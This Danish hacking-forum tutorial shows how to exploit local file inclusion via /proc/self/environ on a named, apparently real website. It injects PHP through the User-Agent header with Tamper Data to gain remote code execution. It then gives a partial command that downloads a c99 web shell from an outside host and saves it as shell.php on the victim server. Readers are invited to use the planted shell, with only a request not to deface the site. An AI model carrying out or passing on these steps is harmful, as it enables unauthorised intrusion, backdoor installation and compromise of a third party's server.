Done - Happy hacking!

lfi via /proc/self/environ

Sat, 18 Jan 2014 18:50:20 +0100

Denne guide er en ”efterfølger” på min tidligere guide om lfi via php://input. Derfor vælger jeg at springe en smule af introduktion til lfi + identifikation af lfi-afsnittene over, da der allerede står lidt om det i http://www.shellsec.pw/showthread.php?tid=1368

ligesom i vores sidste øvelse har vi en lille forsøgskanin, som er http://deltabec.name/main.php?include=helena.html

Ligesom sidste gang kan vi hurtigt se, at include-parameteret ”sladrer” om serverens indhold ved brug af /etc/passwd

Og det gør den også ved /proc/self/environ denne gang!

Ligesom sidste gang vælger vi at bruge firefox som browser, og vi skal desuden bruge tamper data-plugin. Hvis I er helt uerfarne med, hvad tamper data bruges til, så kan det anbefales lige at læse på Spagnum's introduktion til det her http://www.shellsec.pw/showthread.php?tid=77

Nu skal vi så prøve at aktivere vores tamper data plugin, hvorefter vi opdateren siden. Læg bla. Mærke til, hvad jeres user agent vil sige

Efter vi prøver at lave tamper data, vil vi prøve at teste for RCE (remote code execution) ligesom sidste gang. Gør som i billedet nedenunder og skriv i UA-feltet og tryk på ok. Bagefter vil der komme nogle andre irrelevante ting, som den vil spørge om du vil bruge tamper data på. Ignorer dem og vent til siden loader
Hvis alt er gjort rigtigt, kan vi nu se, at vi kan lave RCE via brugeren vceroot! Til til at shelle nu

For at lægge et shell op på serveren, skal I bare skrive ligesom i sidste vejledning http://www.sh3ll.org/c99.txt -O shell.php');?> eller noget andet, alt efter hvad jeres shell skal hedde :P

Hvis alt er gået som det skulle, har vi nu et c99 shell liggende på http://deltabec.name/shell.php – ligesom sidst, vil jeg gerne bede folk om at lade være med at deface eller andet, da det kun ødelægger formålet med vejledningen, hvis folk defacer og admin patcher fejlen

Håber det var noget folk kunne bruge til noget :)

EDIT: Der lader til at være problemer med billederne, så linker lige til dem her i bunden som et midlertidigt alternativ - de er sorteret i rækkefølge
http://s22.postimg.org/hestu751r/image.png
http://s22.postimg.org/l9w7wro7j/image.png
http://s22.postimg.org/vik3oumvj/image.png
ttp://s22.postimg.org/ojan38cb3/image.png